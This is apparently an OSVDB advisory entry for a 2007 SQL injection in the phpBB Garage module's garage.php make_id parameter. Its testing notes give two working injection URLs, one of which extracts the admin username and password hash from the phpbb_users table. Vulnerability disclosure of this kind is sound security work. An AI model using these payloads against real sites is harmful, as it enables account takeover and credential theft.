phpBB Garage garage.php search Action make_id Variable SQL Injection

2007-12-03T00:00:00
ID OSVDB:39696
Type osvdb
Reporter OSVDB
Modified 2007-12-03T00:00:00

Description

Manual Testing Notes

garage.php?mode=browse&search=yes&make_id=-1//union//select//1,2/* garage.php?mode=browse&search=yes&make_id=-1//union//select//concat(user_password,char(94),username),2//from//phpbb_users//where//user_id=2/*

References:

Vendor URL: http://phpbbgarage.com ISS X-Force ID: 38832 Generic Exploit URL: http://www.milw0rm.com/exploits/4686 CVE-2007-6223 Bugtraq ID: 26683